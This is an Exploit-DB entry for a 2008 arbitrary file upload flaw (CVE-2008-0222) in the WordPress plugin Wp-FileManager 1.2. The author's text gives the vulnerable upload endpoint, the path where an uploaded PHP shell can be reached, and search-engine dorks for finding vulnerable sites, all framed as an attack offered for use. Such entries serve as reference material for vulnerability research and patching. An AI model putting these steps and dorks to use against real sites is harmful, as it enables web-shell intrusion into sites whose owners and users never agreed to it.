WordPress Plugin Wp-FileManager 1.2 - Arbitrary File Upload

Author: Houssamix
type: webapps
platform: php
port: 
date_added: 2008-01-05  
date_updated: 2016-11-08  
verified: 1  
codes: OSVDB-43417;CVE-2008-0222  
tags: WordPress Plugin  
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comwp-filemanager.1.2.zip  

raw file: 4844.txt  

######################################################################################
# AUTHOR : H-T TeaM {HouSSaMix _ ToXiC350}                                           #
# HOME : http://no-hack.net                                                          #
# Script :  Wordpress Plugin Wp-FileManager                                          #
# Download : http://downloads.wordpress.org/plugin/wp-filemanager.1.2.zip            #
# BUG :  Remote File Upload Vulnerability [ Shell Upload Exploit  ]                  #
######################################################################################

(~)| 3xpl0it4t10n :

		This file allowed you to upload directly a PHP script or anything you want it

		You have just to enter into :

			http://[TARGEt]/[path_wordpress]/wp-content/plugins/wp-filemanager/ajaxfilemanager/ajaxfilemanager.php

		After uploading you evil script you will find it in this directory :

			http://[TARGEt]/[path_wordpress]/uploaded/[evil].(php)


		HeRe we are some dorks :

          plugins/wp-filemanager/
          inurl:/wp-filemanager/




# greezt : GoLd_M , RoMaNcYxHaCkEr , DDos , and all muslims Hackers



######################################################################################
#                  H-T TeaM {HouSSaMix _ ToXiC350}                                   #
######################################################################################

# milw0rm.com [2008-01-06]